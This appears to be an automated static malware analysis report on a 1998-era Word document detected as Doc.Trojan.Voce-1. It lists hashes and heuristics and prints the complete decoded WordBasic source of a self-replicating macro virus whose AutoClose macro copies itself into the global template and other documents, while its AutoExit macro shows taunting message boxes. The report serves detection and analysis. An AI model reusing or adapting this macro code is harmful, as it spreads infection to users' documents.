Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7576b43cb1141238…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 31.0 KB
Created: 1998-01-01 00:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b56272a080b6b6821ba3cb72277977d5
SHA-1: f1d777e8e5ba056f348eb7e9473dd0f009b1bc69
SHA-256: 7576b43cb1141238721a0ee15b93422a1f674d2ff39532c272db11aac54e345a
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macros, specifically an AutoClose macro, which is designed to infect other documents by copying itself. The macro attempts to verify if it has already infected the victim document before proceeding. The presence of AutoClose and AutoExit macros, along with ClamAV detections, strongly suggests malicious intent related to macro-based malware.

Heuristics (4)

  • ClamAV: Doc.Trojan.Voce-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Voce-1
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Document contains an Auto_Close macro, which Word runs automatically when the document is closed
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not by itself a downloader or parser-CVE attribution.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2107 bytes
SHA-256: 9b7418e2f4b9de38897865ae3a4e39d30a1c068c02052ac2ceba130da2c2fff0
Detection: ClamAV: Doc.Trojan.Voce-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
    Infectar
End Sub

Private Sub Infectar()
Dim Infectado
Infectado = VerificaVitima(0)
If Infectado = 0 Then
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExit", "Global:AutoExit", 1
Else
    Infectado = VerificaVitima(1)
    If Infectado = 0 Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose", 1
        WordBasic.MacroCopy "Global:AutoExit", WordBasic.[WindowName$]() + ":AutoExit", 1
    End If
End If
End Sub

Private Function VerificaVitima(Contexto)
Dim QtdadeMacros
Dim Infectado
Dim MAP0997
Dim i
    QtdadeMacros = WordBasic.CountMacros(Contexto)
    Infectado = 0
    MAP0997 = 0
    If QtdadeMacros > 0 Then
        For i = 1 To QtdadeMacros
            If WordBasic.[MacroName$](i, Contexto) = "AutoClose" Or MAP0997 = 1 Then
                MAP0997 = 1
                If WordBasic.[MacroName$](i, Contexto) = "AutoExit" Then
                    Infectado = 1
                End If
            End If
        Next
    End If
    VerificaVitima = Infectado
End Function

Attribute VB_Name = "AutoExit"

Public Sub MAIN()
    Mensagem
End Sub

Private Sub Mensagem()
Dim Atraso
Dim fim
    If (WordBasic.Day(WordBasic.Now()) = 28 And WordBasic.Month(WordBasic.Now()) = 7) Then
        WordBasic.MsgBox "Parabéns para mim! ", "É meu aniversário", -8
        Atraso = 3
    Else
        WordBasic.MsgBox "Fechando 2807M! ", "Nova Vítima", -8
        Atraso = 1
    End If
    fim = WordBasic.Second(WordBasic.Now()) + Atraso
    While WordBasic.Second(WordBasic.Now()) <> fim
    Wend
End Sub

Attribute VB_Name = "NewMacros"